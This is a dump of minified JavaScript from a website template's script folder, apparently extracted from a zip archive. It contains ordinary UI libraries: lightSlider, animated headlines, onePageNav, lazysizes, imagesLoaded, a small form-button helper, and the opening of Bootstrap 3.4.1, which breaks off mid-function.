b=!1,c=!0;t-=a,t>m-o-e.slideMargin?(t=m-o-e.slideMargin,e.autoWidth===!1&&(b=!0)):0>t&&(t=0);var d=function(a){var c=0;if(b||a&&(c=1),e.autoWidth)for(var d=0,f=0;f<h.length&&(d+=parseInt(h.eq(f).width())+e.slideMargin,q=f+c,!(d>=t));f++);else{var g=t/((v+e.slideMargin)*e.slideMove);q=parseInt(g)+c,t>=m-o-e.slideMargin&&g%1!==0&&q++}};a>=e.swipeThreshold?(d(!1),c=!1):a<=-e.swipeThreshold&&(d(!0),c=!1),g.mode(c),this.slideThumb()}else a>=e.swipeThreshold?g.goToPrevSlide():a<=-e.swipeThreshold&&g.goToNextSlide()},enableDrag:function(){var b=this;if(!y){var c=0,d=0,f=!1;p.find(".lightSlider").addClass("lsGrab"),p.on("mousedown",function(b){return o>m&&0!==m?!1:void("lSPrev"!==a(b.target).attr("class")&&"lSNext"!==a(b.target).attr("class")&&(c=e.vertical===!0?b.pageY:b.pageX,f=!0,b.preventDefault?b.preventDefault():b.returnValue=!1,p.scrollLeft+=1,p.scrollLeft-=1,p.find(".lightSlider").removeClass("lsGrab").addClass("lsGrabbing"),clearInterval(x)))}),a(window).on("mousemove",function(a){f&&(d=e.vertical===!0?a.pageY:a.pageX,b.touchMove(d,c))}),a(window).on("mouseup",function(g){if(f){p.find(".lightSlider").removeClass("lsGrabbing").addClass("lsGrab"),f=!1,d=e.vertical===!0?g.pageY:g.pageX;var h=d-c;Math.abs(h)>=e.swipeThreshold&&a(window).on("click.ls",function(b){b.preventDefault?b.preventDefault():b.returnValue=!1,b.stopImmediatePropagation(),b.stopPropagation(),a(window).off("click.ls")}),b.touchEnd(h)}})}},enableTouch:function(){var a=this;if(y){var b={},c={};p.on("touchstart",function(a){c=a.originalEvent.targetTouches[0],b.pageX=a.originalEvent.targetTouches[0].pageX,b.pageY=a.originalEvent.targetTouches[0].pageY,clearInterval(x)}),p.on("touchmove",function(d){if(o>m&&0!==m)return!1;var f=d.originalEvent;c=f.targetTouches[0];var g=Math.abs(c.pageX-b.pageX),h=Math.abs(c.pageY-b.pageY);e.vertical===!0?(3*h>g&&d.preventDefault(),a.touchMove(c.pageY,b.pageY)):(3*g>h&&d.preventDefault(),a.touchMove(c.pageX,b.pageX))}),p.on("touchend",function(){if(o>m&&0!==m)return!1;var d;d=e.vertical===!0?c.pageY-b.pageY:c.pageX-b.pageX,a.touchEnd(d)})}},build:function(){var b=this;b.initialStyle(),this.doCss()&&(e.enableTouch===!0&&b.enableTouch(),e.enableDrag===!0&&b.enableDrag()),a(window).on("focus",function(){b.auto()}),a(window).on("blur",function(){clearInterval(x)}),b.pager(),b.pauseOnHover(),b.controls(),b.keyPress()}},d.build(),z.init=function(){z.chbreakpoint(),e.vertical===!0?(o=e.item>1?e.verticalHeight:h.outerHeight(),p.css("height",o+"px")):o=p.outerWidth(),e.loop===!0&&"slide"===e.mode&&z.clone(),z.calL(),"slide"===e.mode&&g.removeClass("lSSlide"),"slide"===e.mode&&(z.calSW(),z.sSW()),setTimeout(function(){"slide"===e.mode&&g.addClass("lSSlide")},1e3),e.pager&&z.createPager(),e.adaptiveHeight===!0&&e.vertical===!1&&g.css("height",h.eq(q).outerHeight(!0)),e.adaptiveHeight===!1&&("slide"===e.mode?e.vertical===!1?d.setHeight(g,!1):d.auto():d.setHeight(g,!0)),e.gallery===!0&&d.slideThumb(),"slide"===e.mode&&d.slide(),e.autoWidth===!1?h.length<=e.item?p.find(".lSAction").hide():p.find(".lSAction").show():z.calWidth(!1)<o&&0!==m?p.find(".lSAction").hide():p.find(".lSAction").show()},g.goToPrevSlide=function(){if(q>0)e.onBeforePrevSlide.call(this,g,q),q--,g.mode(!1),e.gallery===!0&&d.slideThumb();else if(e.loop===!0){if(e.onBeforePrevSlide.call(this,g,q),"fade"===e.mode){var a=l-1;q=parseInt(a/e.slideMove)}g.mode(!1),e.gallery===!0&&d.slideThumb()}else e.slideEndAnimation===!0&&(g.addClass("leftEnd"),setTimeout(function(){g.removeClass("leftEnd")},400))},g.goToNextSlide=function(){var a=!0;if("slide"===e.mode){var b=d.slideValue();a=b<m-o-e.slideMargin}q*e.slideMove<l-e.slideMove&&a?(e.onBeforeNextSlide.call(this,g,q),q++,g.mode(!1),e.gallery===!0&&d.slideThumb()):e.loop===!0?(e.onBeforeNextSlide.call(this,g,q),q=0,g.mode(!1),e.gallery===!0&&d.slideThumb()):e.slideEndAnimation===!0&&(g.addClass("rightEnd"),setTimeout(function(){g.removeClass("rightEnd")},400))},g.mode=function(a){e.adaptiveHeight===!0&&e.vertical===!1&&g.css("height",h.eq(q).outerHeight(!0)),n===!1&&("slide"===e.mode?d.doCss()&&(g.addClass("lSSlide"),""!==e.speed&&p.css("transition-duration",e.speed+"ms"),""!==e.cssEasing&&p.css("transition-timing-function",e.cssEasing)):d.doCss()&&(""!==e.speed&&g.css("transition-duration",e.speed+"ms"),""!==e.cssEasing&&g.css("transition-timing-function",e.cssEasing))),a||e.onBeforeSlide.call(this,g,q),"slide"===e.mode?d.slide():d.fade(),p.hasClass("ls-hover")||d.auto(),setTimeout(function(){a||e.onAfterSlide.call(this,g,q)},e.speed),n=!0},g.play=function(){g.goToNextSlide(),e.auto=!0,d.auto()},g.pause=function(){e.auto=!1,clearInterval(x)},g.refresh=function(){z.init()},g.getCurrentSlideCount=function(){var a=q;if(e.loop){var b=p.find(".lslide").length,c=g.find(".clone.left").length;a=c-1>=q?b+(q-c):q>=b+c?q-b-c:q-c}return a+1},g.getTotalSlideCount=function(){return p.find(".lslide").length},g.goToSlide=function(a){q=e.loop?a+g.find(".clone.left").length-1:a,g.mode(!1),e.gallery===!0&&d.slideThumb()},g.destroy=function(){g.lightSlider&&(g.goToPrevSlide=function(){},g.goToNextSlide=function(){},g.mode=function(){},g.play=function(){},g.pause=function(){},g.refresh=function(){},g.getCurrentSlideCount=function(){},g.getTotalSlideCount=function(){},g.goToSlide=function(){},g.lightSlider=null,z={init:function(){}},g.parent().parent().find(".lSAction, .lSPager").remove(),g.removeClass("lightSlider lSFade lSSlide lsGrab lsGrabbing leftEnd right").removeAttr("style").unwrap().unwrap(),g.children().removeAttr("style"),h.removeClass("lslide active"),g.find(".clone").remove(),h=null,x=null,n=!1,q=0)},setTimeout(function(){e.onSliderLoad.call(this,g)},10),a(window).on("resize orientationchange",function(a){setTimeout(function(){a.preventDefault?a.preventDefault():a.returnValue=!1,z.init()},200)}),this}}(jQuery);

// Animated Headlines
jQuery(function($){$(".animated_headlines").imagesLoaded(function(){function initHeadline(){singleLetters($(".animated_headlines.letters").find("b")),animateHeadline($(".animated_headlines"))}function singleLetters(e){e.each(function(){var e=$(this),a=e.text().split(""),t=e.hasClass("is-visible");for(i in a)e.parents(".rotate-2").length>0&&(a[i]='<span>'+a[i]+"</span>"),a[i]=t?'<i class="in">'+a[i]+"</i>":"<i>"+a[i]+"</i>";var s=a.join("");e.html(s).css("opacity",1)})}function animateHeadline(e){var i=animationDelay;e.each(function(){var e=$(this);if(e.hasClass("loading-bar"))i=barAnimationDelay,setTimeout(function(){e.find(".ah-words-wrapper").addClass("is-loading")},barWaiting);else if(e.hasClass("reset-width")){t=(a=e.find(".ah-words-wrapper")).width();a.css("width",t)}else if(e.hasClass("clip")){var a=e.find(".ah-words-wrapper"),t=a.width()+5;a.css("width","auto"),s=0}else if(!e.hasClass("type")){var s=0;e.find(".ah-words-wrapper b").each(function(){var e=$(this).width();e>s&&(s=e)}),e.find(".ah-words-wrapper").css("width",s+10)}setTimeout(function(){hideWord(e.find(".is-visible").eq(0))},i)})}function hideWord(e){var i=takeNext(e);if(e.parents(".animated_headlines").hasClass("type")){var a=e.parent(".ah-words-wrapper");a.addClass("selected").removeClass("waiting"),setTimeout(function(){a.removeClass("selected").animate({width:"auto"}),e.removeClass("is-visible").addClass("is-hidden").children("i").removeClass("in").addClass("out")},selectionDuration),setTimeout(function(){showWord(i,typeLettersDelay)},typeAnimationDelay)}else if(e.parents(".animated_headlines").hasClass("letters")){var t=e.children("i").length>=i.children("i").length;hideLetter(e.find("i").eq(0),e,t,lettersDelay),showLetter(i.find("i").eq(0),i,t,lettersDelay)}else e.parents(".animated_headlines").hasClass("clip")?e.parents(".ah-words-wrapper").animate({width:"2px"},revealDuration,function(){switchWord(e,i),showWord(i)}):e.parents(".animated_headlines").hasClass("reset-width")?e.parents(".ah-words-wrapper").animate({width:"auto"},revealDuration,function(){switchWord(e,i),showWord(i)}):e.parents(".animated_headlines").hasClass("loading-bar")?(e.parents(".ah-words-wrapper").removeClass("is-loading"),switchWord(e,i),setTimeout(function(){hideWord(i)},barAnimationDelay),setTimeout(function(){e.parents(".ah-words-wrapper").addClass("is-loading")},barWaiting)):(switchWord(e,i),setTimeout(function(){hideWord(i)},animationDelay))}function showWord(e,i){e.parents(".animated_headlines").hasClass("type")?(showLetter(e.find("i").eq(0),e,!1,i),e.addClass("is-visible").removeClass("is-hidden").animate({width:"auto"})):e.parents(".animated_headlines").hasClass("reset-width")?e.parents(".ah-words-wrapper").animate({width:e.width()},revealDuration,function(){setTimeout(function(){hideWord(e)},revealAnimationDelay)}):e.parents(".animated_headlines").hasClass("clip")&&e.parents(".ah-words-wrapper").animate({width:e.width()+5},revealDuration,function(){setTimeout(function(){hideWord(e)},revealAnimationDelay)})}function hideLetter(e,i,a,t){if(e.removeClass("in").addClass("out"),e.is(":last-child")?a&&setTimeout(function(){hideWord(takeNext(i))},animationDelay):setTimeout(function(){hideLetter(e.next(),i,a,t)},t),e.is(":last-child")&&$("html").hasClass("no-csstransitions")){var s=takeNext(i);switchWord(i,s)}}function showLetter(e,i,a,t){e.addClass("in").removeClass("out"),e.is(":last-child")?(i.parents(".animated_headlines").hasClass("type")&&setTimeout(function(){i.parents(".ah-words-wrapper").addClass("waiting")},300),a||setTimeout(function(){hideWord(i)},animationDelay)):setTimeout(function(){showLetter(e.next(),i,a,t)},t)}function takeNext(e){return e.is(":last-child")?e.parent().children().eq(0):e.next()}function takePrev(e){return e.is(":first-child")?e.parent().children().last():e.prev()}function switchWord(e,i){e.removeClass("is-visible").addClass("is-hidden"),i.removeClass("is-hidden").addClass("is-visible")}var animationDelay=2500,barAnimationDelay=3800,barWaiting=barAnimationDelay-3e3,lettersDelay=90,typeLettersDelay=170,selectionDuration=600,typeAnimationDelay=selectionDuration+800,revealDuration=800,revealAnimationDelay=2500;initHeadline();})});

/* jQuery Nav (Onepage): onePageNav */
!function(a,b,c,d){var e=function(d,e){this.elem=d,this.$elem=a(d),this.options=e,this.metadata=this.$elem.data("plugin-options"),this.$win=a(b),this.sections={},this.didScroll=!1,this.$doc=a(c),this.docHeight=this.$doc.height()};e.prototype={defaults:{navItems:"a",currentClass:"current",changeHash:!1,easing:"swing",filter:"",scrollSpeed:750,scrollThreshold:.5,begin:!1,end:!1,scrollChange:!1},init:function(){return this.config=a.extend({},this.defaults,this.options,this.metadata),this.$nav=this.$elem.find(this.config.navItems),""!==this.config.filter&&(this.$nav=this.$nav.filter(this.config.filter)),this.$nav.on("click.onePageNav",a.proxy(this.handleClick,this)),this.getPositions(),this.bindInterval(),this.$win.on("resize.onePageNav",a.proxy(this.getPositions,this)),this},adjustNav:function(a,b){a.$elem.find("."+a.config.currentClass).removeClass(a.config.currentClass),b.addClass(a.config.currentClass)},bindInterval:function(){var b,a=this;a.$win.on("scroll.onePageNav",function(){a.didScroll=!0}),a.t=setInterval(function(){b=a.$doc.height(),a.didScroll&&(a.didScroll=!1,a.scrollChange()),b!==a.docHeight&&(a.docHeight=b,a.getPositions())},250)},getHash:function(a){return a.attr("href").split("#")[1]},getPositions:function(){var c,d,e,b=this;b.$nav.each(function(){c=b.getHash(a(this)),e=a("#"+c),e.length&&(d=e.offset().top,b.sections[c]=Math.round(d))})},getSection:function(a){var b=null,c=Math.round(this.$win.height()*this.config.scrollThreshold);for(var d in this.sections)this.sections[d]-c<a&&(b=d);return b},handleClick:function(c){var d=this,e=a(c.currentTarget),f=e.parent(),g="#"+d.getHash(e);f.hasClass(d.config.currentClass)||(d.config.begin&&d.config.begin(),d.adjustNav(d,f),d.unbindInterval(),d.scrollTo(g,function(){d.config.changeHash&&(b.location.hash=g),d.bindInterval(),d.config.end&&d.config.end()})),c.preventDefault()},scrollChange:function(){var c,a=this.$win.scrollTop(),b=this.getSection(a);null!==b&&(c=this.$elem.find('a[href$="#'+b+'"]').parent(),c.hasClass(this.config.currentClass)||(this.adjustNav(this,c),this.config.scrollChange&&this.config.scrollChange(c)))},scrollTo:function(b,c){var d=a(b).offset().top-65;a("html, body").animate({scrollTop:d},this.config.scrollSpeed,this.config.easing,c)},unbindInterval:function(){clearInterval(this.t),this.$win.unbind("scroll.onePageNav")}},e.defaults=e.prototype.defaults,a.fn.onePageNav=function(a){return this.each(function(){new e(this,a).init()})}}(jQuery,window,document);

/*! lazysizes - v5.2.0 "Lazy Loading for images" (https://github.com/aFarkas/lazysizes)*/
!function(a,b){var c=b(a,a.document,Date);a.lazySizes=c,"object"==typeof module&&module.exports&&(module.exports=c)}("undefined"!=typeof window?window:{},function(a,b,c){"use strict";var d,e;if(function(){var b,c={lazyClass:"lazyload",loadedClass:"lazyloaded",loadingClass:"lazyloading",preloadClass:"lazypreload",errorClass:"lazyerror",autosizesClass:"lazyautosizes",srcAttr:"data-src",srcsetAttr:"data-srcset",sizesAttr:"data-sizes",minSize:40,customMedia:{},init:!0,expFactor:1.5,hFac:.8,loadMode:2,loadHidden:!0,ricTimeout:0,throttleDelay:125};e=a.lazySizesConfig||a.lazysizesConfig||{};for(b in c)b in e||(e[b]=c[b])}(),!b||!b.getElementsByClassName)return{init:function(){},cfg:e,noSupport:!0};var f=b.documentElement,g=a.HTMLPictureElement,h="addEventListener",i="getAttribute",j=a[h].bind(a),k=a.setTimeout,l=a.requestAnimationFrame||k,m=a.requestIdleCallback,n=/^picture$/i,o=["load","error","lazyincluded","_lazyloaded"],p={},q=Array.prototype.forEach,r=function(a,b){return p[b]||(p[b]=new RegExp("(\\s|^)"+b+"(\\s|$)")),p[b].test(a[i]("class")||"")&&p[b]},s=function(a,b){r(a,b)||a.setAttribute("class",(a[i]("class")||"").trim()+" "+b)},t=function(a,b){var c;(c=r(a,b))&&a.setAttribute("class",(a[i]("class")||"").replace(c," "))},u=function(a,b,c){var d=c?h:"removeEventListener";c&&u(a,b),o.forEach(function(c){a[d](c,b)})},v=function(a,c,e,f,g){var h=b.createEvent("Event");return e||(e={}),e.instance=d,h.initEvent(c,!f,!g),h.detail=e,a.dispatchEvent(h),h},w=function(b,c){var d;!g&&(d=a.picturefill||e.pf)?(c&&c.src&&!b[i]("srcset")&&b.setAttribute("srcset",c.src),d({reevaluate:!0,elements:[b]})):c&&c.src&&(b.src=c.src)},x=function(a,b){return(getComputedStyle(a,null)||{})[b]},y=function(a,b,c){for(c=c||a.offsetWidth;c<e.minSize&&b&&!a._lazysizesWidth;)c=b.offsetWidth,b=b.parentNode;return c},z=function(){var a,c,d=[],e=[],f=d,g=function(){var b=f;for(f=d.length?e:d,a=!0,c=!1;b.length;)b.shift()();a=!1},h=function(d,e){a&&!e?d.apply(this,arguments):(f.push(d),c||(c=!0,(b.hidden?k:l)(g)))};return h._lsFlush=g,h}(),A=function(a,b){return b?function(){z(a)}:function(){var b=this,c=arguments;z(function(){a.apply(b,c)})}},B=function(a){var b,d=0,f=e.throttleDelay,g=e.ricTimeout,h=function(){b=!1,d=c.now(),a()},i=m&&g>49?function(){m(h,{timeout:g}),g!==e.ricTimeout&&(g=e.ricTimeout)}:A(function(){k(h)},!0);return function(a){var e;(a=!0===a)&&(g=33),b||(b=!0,e=f-(c.now()-d),e<0&&(e=0),a||e<9?i():k(i,e))}},C=function(a){var b,d,e=99,f=function(){b=null,a()},g=function(){var a=c.now()-d;a<e?k(g,e-a):(m||f)(f)};return function(){d=c.now(),b||(b=k(g,e))}},D=function(){var g,m,o,p,y,D,F,G,H,I,J,K,L=/^img$/i,M=/^iframe$/i,N="onscroll"in a&&!/(gle|ing)bot/.test(navigator.userAgent),O=0,P=0,Q=0,R=-1,S=function(a){Q--,(!a||Q<0||!a.target)&&(Q=0)},T=function(a){return null==K&&(K="hidden"==x(b.body,"visibility")),K||!("hidden"==x(a.parentNode,"visibility")&&"hidden"==x(a,"visibility"))},U=function(a,c){var d,e=a,g=T(a);for(G-=c,J+=c,H-=c,I+=c;g&&(e=e.offsetParent)&&e!=b.body&&e!=f;)(g=(x(e,"opacity")||1)>0)&&"visible"!=x(e,"overflow")&&(d=e.getBoundingClientRect(),g=I>d.left&&H<d.right&&J>d.top-1&&G<d.bottom+1);return g},V=function(){var a,c,h,j,k,l,n,o,q,r,s,t,u=d.elements;if((p=e.loadMode)&&Q<8&&(a=u.length)){for(c=0,R++;c<a;c++)if(u[c]&&!u[c]._lazyRace)if(!N||d.prematureUnveil&&d.prematureUnveil(u[c]))ba(u[c]);else if((o=u[c][i]("data-expand"))&&(l=1*o)||(l=P),r||(r=!e.expand||e.expand<1?f.clientHeight>500&&f.clientWidth>500?500:370:e.expand,d._defEx=r,s=r*e.expFactor,t=e.hFac,K=null,P<s&&Q<1&&R>2&&p>2&&!b.hidden?(P=s,R=0):P=p>1&&R>1&&Q<6?r:O),q!==l&&(D=innerWidth+l*t,F=innerHeight+l,n=-1*l,q=l),h=u[c].getBoundingClientRect(),(J=h.bottom)>=n&&(G=h.top)<=F&&(I=h.right)>=n*t&&(H=h.left)<=D&&(J||I||H||G)&&(e.loadHidden||T(u[c]))&&(m&&Q<3&&!o&&(p<3||R<4)||U(u[c],l))){if(ba(u[c]),k=!0,Q>9)break}else!k&&m&&!j&&Q<4&&R<4&&p>2&&(g[0]||e.preloadAfterLoad)&&(g[0]||!o&&(J||I||H||G||"auto"!=u[c][i](e.sizesAttr)))&&(j=g[0]||u[c]);j&&!k&&ba(j)}},W=B(V),X=function(a){var b=a.target;if(b._lazyCache)return void delete b._lazyCache;S(a),s(b,e.loadedClass),t(b,e.loadingClass),u(b,Z),v(b,"lazyloaded")},Y=A(X),Z=function(a){Y({target:a.target})},$=function(a,b){try{a.contentWindow.location.replace(b)}catch(c){a.src=b}},_=function(a){var b,c=a[i](e.srcsetAttr);(b=e.customMedia[a[i]("data-media")||a[i]("media")])&&a.setAttribute("media",b),c&&a.setAttribute("srcset",c)},aa=A(function(a,b,c,d,f){var g,h,j,l,m,p;(m=v(a,"lazybeforeunveil",b)).defaultPrevented||(d&&(c?s(a,e.autosizesClass):a.setAttribute("sizes",d)),h=a[i](e.srcsetAttr),g=a[i](e.srcAttr),f&&(j=a.parentNode,l=j&&n.test(j.nodeName||"")),p=b.firesLoad||"src"in a&&(h||g||l),m={target:a},s(a,e.loadingClass),p&&(clearTimeout(o),o=k(S,2500),u(a,Z,!0)),l&&q.call(j.getElementsByTagName("source"),_),h?a.setAttribute("srcset",h):g&&!l&&(M.test(a.nodeName)?$(a,g):a.src=g),f&&(h||l)&&w(a,{src:g})),a._lazyRace&&delete a._lazyRace,t(a,e.lazyClass),z(function(){var b=a.complete&&a.naturalWidth>1;p&&!b||(b&&s(a,"ls-is-cached"),X(m),a._lazyCache=!0,k(function(){"_lazyCache"in a&&delete a._lazyCache},9)),"lazy"==a.loading&&Q--},!0)}),ba=function(a){if(!a._lazyRace){var b,c=L.test(a.nodeName),d=c&&(a[i](e.sizesAttr)||a[i]("sizes")),f="auto"==d;(!f&&m||!c||!a[i]("src")&&!a.srcset||a.complete||r(a,e.errorClass)||!r(a,e.lazyClass))&&(b=v(a,"lazyunveilread").detail,f&&E.updateElem(a,!0,a.offsetWidth),a._lazyRace=!0,Q++,aa(a,b,f,d,c))}},ca=C(function(){e.loadMode=3,W()}),da=function(){3==e.loadMode&&(e.loadMode=2),ca()},ea=function(){if(!m){if(c.now()-y<999)return void k(ea,999);m=!0,e.loadMode=3,W(),j("scroll",da,!0)}};return{_:function(){y=c.now(),d.elements=b.getElementsByClassName(e.lazyClass),g=b.getElementsByClassName(e.lazyClass+" "+e.preloadClass),j("scroll",W,!0),j("resize",W,!0),j("pageshow",function(a){if(a.persisted){var c=b.querySelectorAll("."+e.loadingClass);c.length&&c.forEach&&l(function(){c.forEach(function(a){a.complete&&ba(a)})})}}),a.MutationObserver?new MutationObserver(W).observe(f,{childList:!0,subtree:!0,attributes:!0}):(f[h]("DOMNodeInserted",W,!0),f[h]("DOMAttrModified",W,!0),setInterval(W,999)),j("hashchange",W,!0),["focus","mouseover","click","load","transitionend","animationend"].forEach(function(a){b[h](a,W,!0)}),/d$|^c/.test(b.readyState)?ea():(j("load",ea),b[h]("DOMContentLoaded",W),k(ea,2e4)),d.elements.length?(V(),z._lsFlush()):W()},checkElems:W,unveil:ba,_aLSL:da}}(),E=function(){var a,c=A(function(a,b,c,d){var e,f,g;if(a._lazysizesWidth=d,d+="px",a.setAttribute("sizes",d),n.test(b.nodeName||""))for(e=b.getElementsByTagName("source"),f=0,g=e.length;f<g;f++)e[f].setAttribute("sizes",d);c.detail.dataAttr||w(a,c.detail)}),d=function(a,b,d){var e,f=a.parentNode;f&&(d=y(a,f,d),e=v(a,"lazybeforesizes",{width:d,dataAttr:!!b}),e.defaultPrevented||(d=e.detail.width)&&d!==a._lazysizesWidth&&c(a,f,e,d))},f=function(){var b,c=a.length;if(c)for(b=0;b<c;b++)d(a[b])},g=C(f);return{_:function(){a=b.getElementsByClassName(e.autosizesClass),j("resize",g)},checkElems:g,updateElem:d}}(),F=function(){!F.i&&b.getElementsByClassName&&(F.i=!0,E._(),D._())};return k(function(){e.init&&F()}),d={cfg:e,autoSizer:E,loader:D,init:F,uP:w,aC:s,rC:t,hC:r,fire:v,gW:y,rAF:z}});
// lazysizes: add simple support for background images:
document.addEventListener('lazybeforeunveil', function(e){var bg = e.target.getAttribute('data-bg');if(bg){e.target.style.backgroundImage = 'url(' + bg + ')';}});PK!m�S���flex/js/frontend-edit.jsnu&1i�jQuery(function(t){t(document).ready(function(){t(".radio.btn-group label").addClass("btn btn-default"),t(".btn-group label:not(.active)").click(function(){var e=t(this),a=t("#"+e.attr("for"));a.prop("checked")||(e.closest(".btn-group").find("label").removeClass("active btn-success btn-danger btn-primary"),""==a.val()?e.addClass("active btn-primary"):0==a.val()?e.addClass("active btn-danger"):e.addClass("active btn-success"),a.prop("checked",!0))}),t(".btn-group input[checked=checked]").each(function(){""==t(this).val()?t("label[for="+t(this).attr("id")+"]").addClass("active btn-primary"):0==t(this).val()?t("label[for="+t(this).attr("id")+"]").addClass("active btn-danger"):t("label[for="+t(this).attr("id")+"]").addClass("active btn-success")})})}),"undefined"!=typeof jQuery&&"undefined"!=typeof MooTools&&jQuery(function(t){t(document).ready(function(){t(".carousel").each(function(e,a){t(this)[e].slide=null})}),window.addEvent("domready",function(){Element.prototype.hide=function(){}})});PK!Җ9d��flex/js/imagesloaded.min.jsnu&1i�/*!
 * imagesLoaded PACKAGED v4.1.4
 * JavaScript is all like "You images are done yet or what?"
 * MIT License
 */

!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.apply(this,t)}return this}},t.allOff=function(){delete this._events,delete this._onceEvents},e}),function(e,t){"use strict";"function"==typeof define&&define.amd?define(["ev-emitter/ev-emitter"],function(i){return t(e,i)}):"object"==typeof module&&module.exports?module.exports=t(e,require("ev-emitter")):e.imagesLoaded=t(e,e.EvEmitter)}("undefined"!=typeof window?window:this,function(e,t){function i(e,t){for(var i in t)e[i]=t[i];return e}function n(e){if(Array.isArray(e))return e;var t="object"==typeof e&&"number"==typeof e.length;return t?d.call(e):[e]}function o(e,t,r){if(!(this instanceof o))return new o(e,t,r);var s=e;return"string"==typeof e&&(s=document.querySelectorAll(e)),s?(this.elements=n(s),this.options=i({},this.options),"function"==typeof t?r=t:i(this.options,t),r&&this.on("always",r),this.getImages(),h&&(this.jqDeferred=new h.Deferred),void setTimeout(this.check.bind(this))):void a.error("Bad element for imagesLoaded "+(s||e))}function r(e){this.img=e}function s(e,t){this.url=e,this.element=t,this.img=new Image}var h=e.jQuery,a=e.console,d=Array.prototype.slice;o.prototype=Object.create(t.prototype),o.prototype.options={},o.prototype.getImages=function(){this.images=[],this.elements.forEach(this.addElementImages,this)},o.prototype.addElementImages=function(e){"IMG"==e.nodeName&&this.addImage(e),this.options.background===!0&&this.addElementBackgroundImages(e);var t=e.nodeType;if(t&&u[t]){for(var i=e.querySelectorAll("img"),n=0;n<i.length;n++){var o=i[n];this.addImage(o)}if("string"==typeof this.options.background){var r=e.querySelectorAll(this.options.background);for(n=0;n<r.length;n++){var s=r[n];this.addElementBackgroundImages(s)}}}};var u={1:!0,9:!0,11:!0};return o.prototype.addElementBackgroundImages=function(e){var t=getComputedStyle(e);if(t)for(var i=/url\((['"])?(.*?)\1\)/gi,n=i.exec(t.backgroundImage);null!==n;){var o=n&&n[2];o&&this.addBackground(o,e),n=i.exec(t.backgroundImage)}},o.prototype.addImage=function(e){var t=new r(e);this.images.push(t)},o.prototype.addBackground=function(e,t){var i=new s(e,t);this.images.push(i)},o.prototype.check=function(){function e(e,i,n){setTimeout(function(){t.progress(e,i,n)})}var t=this;return this.progressedCount=0,this.hasAnyBroken=!1,this.images.length?void this.images.forEach(function(t){t.once("progress",e),t.check()}):void this.complete()},o.prototype.progress=function(e,t,i){this.progressedCount++,this.hasAnyBroken=this.hasAnyBroken||!e.isLoaded,this.emitEvent("progress",[this,e,t]),this.jqDeferred&&this.jqDeferred.notify&&this.jqDeferred.notify(this,e),this.progressedCount==this.images.length&&this.complete(),this.options.debug&&a&&a.log("progress: "+i,e,t)},o.prototype.complete=function(){var e=this.hasAnyBroken?"fail":"done";if(this.isComplete=!0,this.emitEvent(e,[this]),this.emitEvent("always",[this]),this.jqDeferred){var t=this.hasAnyBroken?"reject":"resolve";this.jqDeferred[t](this)}},r.prototype=Object.create(t.prototype),r.prototype.check=function(){var e=this.getIsImageComplete();return e?void this.confirm(0!==this.img.naturalWidth,"naturalWidth"):(this.proxyImage=new Image,this.proxyImage.addEventListener("load",this),this.proxyImage.addEventListener("error",this),this.img.addEventListener("load",this),this.img.addEventListener("error",this),void(this.proxyImage.src=this.img.src))},r.prototype.getIsImageComplete=function(){return this.img.complete&&this.img.naturalWidth},r.prototype.confirm=function(e,t){this.isLoaded=e,this.emitEvent("progress",[this,this.img,t])},r.prototype.handleEvent=function(e){var t="on"+e.type;this[t]&&this[t](e)},r.prototype.onload=function(){this.confirm(!0,"onload"),this.unbindEvents()},r.prototype.onerror=function(){this.confirm(!1,"onerror"),this.unbindEvents()},r.prototype.unbindEvents=function(){this.proxyImage.removeEventListener("load",this),this.proxyImage.removeEventListener("error",this),this.img.removeEventListener("load",this),this.img.removeEventListener("error",this)},s.prototype=Object.create(r.prototype),s.prototype.check=function(){this.img.addEventListener("load",this),this.img.addEventListener("error",this),this.img.src=this.url;var e=this.getIsImageComplete();e&&(this.confirm(0!==this.img.naturalWidth,"naturalWidth"),this.unbindEvents())},s.prototype.unbindEvents=function(){this.img.removeEventListener("load",this),this.img.removeEventListener("error",this)},s.prototype.confirm=function(e,t){this.isLoaded=e,this.emitEvent("progress",[this,this.element,t])},o.makeJQueryPlugin=function(t){t=t||e.jQuery,t&&(h=t,h.fn.imagesLoaded=function(e,t){var i=new o(this,e,t);return i.jqDeferred.promise(h(this))})},o.makeJQueryPlugin(),o});PK!'�e���flex/js/bootstrap.min.jsnu&1i�/*!
 * Bootstrap v3.4.1 (https://getbootstrap.com/)
 * Copyright 2011-2019 Twitter, Inc.
 * Licensed under the MIT license
 */
if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");!function(t){"use strict";var e=jQuery.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||3<e[0])throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(),function(n){"use strict";n.fn.emulateTransitionEnd=function(t){var e=!1,i=this;n(this).one("bsTransitionEnd",function(){e=!0});return setTimeout(function(){e||n(i).trigger(n.support.transition.end)},t),this},n(function(){n.support.transition=function o(){var t=document.createElement("bootstrap"),e={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var i in e)if(t.style[i]!==undefined)return{end:e[i]};return!1}(),n.support.transition&&(n.event.special.bsTransitionEnd={bindType:n.support.transition.end,delegateType:n.support.transition.end,handle:function(t){if(n(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}})})}(jQuery),function(s){"use strict";var e='[data-dismiss="alert"]',a=function(t){s(t).on("click",e,this.close)};a.VERSION="3.4.1",a.TRANSITION_DURATION=150,a.prototype.close=function(t){var e=s(this),i=e.attr("data-target");i||(i=(i=e.attr("href"))&&i.replace(/.*(?=#[^\s]*$)/,"")),i="#"===i?[]:i;var o=s(document).find(i);function 